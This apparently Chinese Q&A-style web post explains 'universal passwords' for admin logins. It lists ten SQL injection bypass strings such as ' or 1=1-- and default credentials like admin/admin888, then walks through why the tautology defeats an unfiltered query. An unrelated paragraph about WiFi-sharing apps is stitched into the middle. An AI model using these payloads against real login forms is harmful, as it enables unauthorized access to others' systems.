例如我们要利用第一条就是:
用户名:"or "a"="a
密码:"or "a"="a
*********************************************************
1:"or "a"="a
2: '.).or.('.a.'='.a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6:"or 1=1--
7:'or.'a.'='a
8:"or"="a'='a
9:'or''='
10:'or'='or'
原理都是利用SQL语法来利用注入,其实这也是注入的一种,都是因为提交字符未加过滤或过滤不严而导致的.
其实万能是没有的,默认是很多的,
admin
admin
admin
admin888
少数ASP网页后面登陆时可以用密码1'or'1'='1(用户名用admin等试)登陆成功。这一般也是SQL注入的第一课,原理涉及到SQL语句……验证登陆时,如果密码=输入的密码,那么登陆成功,把1' or '1'='1带入即“如果密码=1或者1=1那么登成功”由于1=1恒成立,且“密码=1”与“1=1”是逻辑或的关系,则整句为TRUE,即登陆成功。这样说懂不?
其实后台万能登陆密码这个称号真的不那么专业,或许叫做“后台验证绕过语句”还好些,不过前者叫得普遍些。
当然很简单了,只要你删除自己手机里面的记忆WiFi网络,选择为忘记网络,在使用wifi万能钥匙的软件进行搜索破解那个wifi热点我无线连接,就可以清楚的知道是不是被其他用户分享了热点,如果无法破解就可以确定没有被分享热点的账号密码信息到网络服务器里面。这种不是万能密码。这种只是黑客手法,利用SQL语言特性,玩的SQL注入。拼接组合出合理的SQL语句,利用程序的漏洞而已。
现在只要是个网站程序,一般都会在设计上避免再让你玩这种SQL注入了。
==============================
回答补充:都不对!!!
---------------------------
如果程序有漏洞的话,默认组装的SQL语句类似以下这种
select * from 用户表名 where username='%1' and password='%2'
假设%1和%2是输入的用户名和密码,则可设置参数
%1为你所说的 admin 账号
%2则为[' or '1'='1](中括号里面的内容,注意空格及半角字符的引号,根据数据库类型不同,也可能全是半角字符的双引号)
这时sql语句就成为了
select * from 用户表名 where username='admin' and password='' or '1'='1'
根据一or(或)就为真的计算机逻辑,此时总是能返回admin这个用户的记录。这就是所谓的万能密码!!
欢迎分享,转载请注明来源:夏雨云
评论列表(0条)